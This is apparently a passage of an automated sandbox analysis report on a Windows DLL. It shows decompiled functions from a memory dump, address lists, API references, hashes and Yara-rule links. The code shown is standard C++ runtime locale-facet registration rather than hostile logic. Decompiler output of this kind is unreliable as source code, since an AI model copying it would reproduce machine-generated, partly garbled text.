				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t242 - 0x14, 0);
				_t231 =  *0x6de96de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6DDB161C(0x6de96d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6DDD66BA(_t242 - 0x14);
					return E6DDF0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6DDE1471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t242 - 0x20);
							E6DDF3D74(_t242 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t225, _t231, 0x14);
							E6DDD6653(_t242 - 0x14, 0);
							_t232 =  *0x6de96dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6DDB161C(0x6de96da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6DDD66BA(_t242 - 0x14);
								return E6DDF0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6DDE14EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t242 - 0x20);
										E6DDF3D74(_t242 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t172, _t226, _t232, 0x14);
										E6DDD6653(_t242 - 0x14, 0);
										_t233 =  *0x6de96dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6DDB161C(0x6de96d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6DDD66BA(_t242 - 0x14);
											return E6DDF0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6DDE1558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t242 - 0x20);
													E6DDF3D74(_t242 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t172, _t227, _t233, 0x14);
													E6DDD6653(_t242 - 0x14, 0);
													_t234 =  *0x6de96e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6DDB161C(0x6de96dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6DDD66BA(_t242 - 0x14);
														return E6DDF0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6DDE15C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t242 - 0x20);
																E6DDF3D74(_t242 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t172, _t228, _t234, 0x14);
																E6DDD6653(_t242 - 0x14, 0);
																_t235 =  *0x6de96dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6DDB161C(0x6de96d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6DDD66BA(_t242 - 0x14);
																	return E6DDF0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6DDE162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6DDB1438(_t207);
																			E6DDF3D74(_t242 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de3851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6de3c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6DDE542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6DDF0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6DDD6FD3(__eflags, _t229);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6de96dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6DDD6FD3(__eflags, _t228);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6de96e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6DDD6FD3(__eflags, _t227);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6de96dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6DDD6FD3(__eflags, _t226);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6de96dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6DDD6FD3(__eflags, _t225);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6de96de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6dddf9f1
0x6dddf9f1
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa22
0x6dddfa27
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f

APIs

__EH_prolog3.LIBCMT ref: 6DDDF9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFA02
int.LIBCPMT ref: 6DDDFA19

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

numpunct.LIBCPMT ref: 6DDDFA3C
std::_Facet_Register.LIBCPMT ref: 6DDDFA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFA91

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 8792a4a143aa701b6491829449569c32f408b5e389723419073e06f415db1bcc
Instruction ID: f4cd8d3ed556c2c5fe17936270260012bc049f072632098db308f716c4ae7035
Opcode Fuzzy Hash: 8792a4a143aa701b6491829449569c32f408b5e389723419073e06f415db1bcc
Instruction Fuzzy Hash: F811C275908129DBCF01FBA4C840AFDB7B4AF84718F264109F611AB290DF74A902CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t198 - 0x14, 0);
				_t189 =  *0x6de96e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6DDB161C(0x6de96e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6DDD66BA(_t198 - 0x14);
					return E6DDF0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6DDEC120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t198 - 0x20);
							E6DDF3D74(_t198 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t184, _t189, 0x14);
							E6DDD6653(_t198 - 0x14, 0);
							_t190 =  *0x6de96e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6DDB161C(0x6de96e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6DDD66BA(_t198 - 0x14);
								return E6DDF0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6DDEC1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t198 - 0x20);
										E6DDF3D74(_t198 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t141, _t185, _t190, 0x14);
										E6DDD6653(_t198 - 0x14, 0);
										_t191 =  *0x6de96e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6DDB161C(0x6de96e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6DDD66BA(_t198 - 0x14);
											return E6DDF0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6DDEC229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t198 - 0x20);
													E6DDF3D74(_t198 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t141, _t186, _t191, 0x14);
													E6DDD6653(_t198 - 0x14, 0);
													_t192 =  *0x6de96e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6DDB161C(0x6de96e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6DDD66BA(_t198 - 0x14);
														return E6DDF0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6DDEC295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6DDB1438(_t169);
																E6DDF3D74(_t198 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de3851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6de3c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6DDED028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6DDF0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6DDD6FD3(__eflags, _t187);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6de96e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6DDD6FD3(__eflags, _t186);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6de96e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6DDD6FD3(__eflags, _t185);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6de96e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6DDD6FD3(__eflags, _t184);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6de96e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6ddeb9e4
0x6ddeb9e4
0x6ddeb9eb
0x6ddeb9f5
0x6ddeb9fa
0x6ddeba05
0x6ddeba09
0x6ddeba0c
0x6ddeba11
0x6ddeba15
0x6ddeba1a
0x6ddeba1e
0x6ddeba63
0x6ddeba66
0x6ddeba72
0x6ddeba20
0x6ddeba22
0x6ddeba28
0x6ddeba2e
0x6ddeba36
0x6ddeba39
0x6ddeba76
0x6ddeba84
0x6ddeba89
0x6ddeba91
0x6ddeba9b
0x6ddebaa0
0x6ddebaab
0x6ddebaaf
0x6ddebab2
0x6ddebab7
0x6ddebac0
0x6ddebac2
0x6ddebac4
0x6ddebb09
0x6ddebb0c
0x6ddebb18
0x6ddebac6
0x6ddebac6
0x6ddebac8
0x6ddebace
0x6ddebad4
0x6ddebadc
0x6ddebadf
0x6ddebb1c
0x6ddebb2a
0x6ddebb2f
0x6ddebb37
0x6ddebb41
0x6ddebb46
0x6ddebb51
0x6ddebb55
0x6ddebb58
0x6ddebb5d
0x6ddebb66
0x6ddebb68
0x6ddebb6a
0x6ddebbaf
0x6ddebbb2
0x6ddebbbe
0x6ddebb6c
0x6ddebb6c
0x6ddebb6e
0x6ddebb74
0x6ddebb7a
0x6ddebb82
0x6ddebb85
0x6ddebbc2
0x6ddebbd0
0x6ddebbd5
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc0c
0x6ddebc0e
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14
0x6ddebb87
0x6ddebb87
0x6ddebb8a
0x6ddebb8e
0x6ddebb92
0x6ddebb9f
0x6ddebba7
0x6ddebba9
0x00000000
0x6ddebba9
0x6ddebb70
0x6ddebb70
0x00000000
0x6ddebb70
0x6ddebb6e
0x6ddebae1
0x6ddebae1
0x6ddebae4
0x6ddebae8
0x6ddebaec
0x6ddebaf9
0x6ddebb01
0x6ddebb03
0x00000000
0x6ddebb03
0x6ddebaca
0x6ddebaca
0x00000000
0x6ddebaca
0x6ddebac8
0x6ddeba3b
0x6ddeba3b
0x6ddeba3e
0x6ddeba42
0x6ddeba46
0x6ddeba53
0x6ddeba5b
0x6ddeba5d
0x00000000
0x6ddeba5d
0x6ddeba24
0x6ddeba24
0x00000000
0x6ddeba24
0x6ddeba22

APIs

__EH_prolog3.LIBCMT ref: 6DDEB9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB9F5
int.LIBCPMT ref: 6DDEBA0C

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDEBA2F
std::_Facet_Register.LIBCPMT ref: 6DDEBA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBA84

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: cc30276444d095497fdd78b1d8948f5280fd380375ce015210d0e584edd35cdb
Instruction ID: 6e8b8521c264e5a2c4bb314263795dc538beb8163a31158d800cfea8a76f15fa
Opcode Fuzzy Hash: cc30276444d095497fdd78b1d8948f5280fd380375ce015210d0e584edd35cdb
Instruction Fuzzy Hash: 6611C675808219DBCF05FB64C840BFDB7B4AF45718F174009F511AB290DFB4AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DDEBA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t154 - 0x14, 0);
				_t147 =  *0x6de96e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6DDB161C(0x6de96e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6DDD66BA(_t154 - 0x14);
					return E6DDF0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6DDEC1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t154 - 0x20);
							E6DDF3D74(_t154 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t143, _t147, 0x14);
							E6DDD6653(_t154 - 0x14, 0);
							_t148 =  *0x6de96e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6DDB161C(0x6de96e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6DDD66BA(_t154 - 0x14);
								return E6DDF0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6DDEC229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t154 - 0x20);
										E6DDF3D74(_t154 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t110, _t144, _t148, 0x14);
										E6DDD6653(_t154 - 0x14, 0);
										_t149 =  *0x6de96e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6DDB161C(0x6de96e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6DDD66BA(_t154 - 0x14);
											return E6DDF0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6DDEC295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6DDB1438(_t131);
													E6DDF3D74(_t154 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de3851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6de3c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6DDED028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6DDF0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6DDD6FD3(__eflags, _t145);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6de96e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6DDD6FD3(__eflags, _t144);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6de96e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6DDD6FD3(__eflags, _t143);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6de96e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEBA91
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBA9B
int.LIBCPMT ref: 6DDEBAB2

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDEBAD5
std::_Facet_Register.LIBCPMT ref: 6DDEBAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBB2A

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
